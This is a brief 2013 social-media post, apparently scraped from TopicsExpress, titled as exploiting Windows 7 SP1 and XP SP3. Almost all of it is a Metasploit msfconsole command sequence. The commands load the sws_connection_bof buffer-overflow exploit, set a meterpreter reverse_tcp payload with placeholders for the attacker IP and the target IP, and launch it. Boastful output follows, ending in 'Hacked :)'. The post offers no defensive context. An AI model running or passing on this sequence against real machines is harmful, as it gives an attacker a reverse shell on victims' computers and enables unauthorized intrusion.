Exploiting Windows 7 SP1 & Windows XP SP3 : Exploit on msfconsole - TopicsExpress



          

Exploiting Windows 7 SP1 & Windows XP SP3 : Exploit on msfconsole : [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] root@Ghost~: msf > use exploit/windows/http/sws_connection_bof root@Ghost~: msf > exploit(sws_connection_bof) > set PAYLOAD windows/meterpreter/reverse_tcp root@Ghost~: msf > exploit(sws_connection_bof) > set LHOST [MY IP ADDRESS] root@Ghost~: msf > exploit(sws_connection_bof) >set RHOST [TARGET IP] root@Ghost~: msf > exploit(sws_connection_bof) > exploit ____________________________________________ [+] Sending buffer (2104 bytes) to: [TARGET]:80 [+] Exploitation Done! [+] Please, wait couple of sec ... [+][+][+][+][+] [+]Hacked :)[+] [+][+][+][+][+] [+]~Ghost Informatics~[+]
Posted on: Mon, 23 Sep 2013 18:16:36 +0000

Trending Topics



Recently Viewed Topics




© 2015